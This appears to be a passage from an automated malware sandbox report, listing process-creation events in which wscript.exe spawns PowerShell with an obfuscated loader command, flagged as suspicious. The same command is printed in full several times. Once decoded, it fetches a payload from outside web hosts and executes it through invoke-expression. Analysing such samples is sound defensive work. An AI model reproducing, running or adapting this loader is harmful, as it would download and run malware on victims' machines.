              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 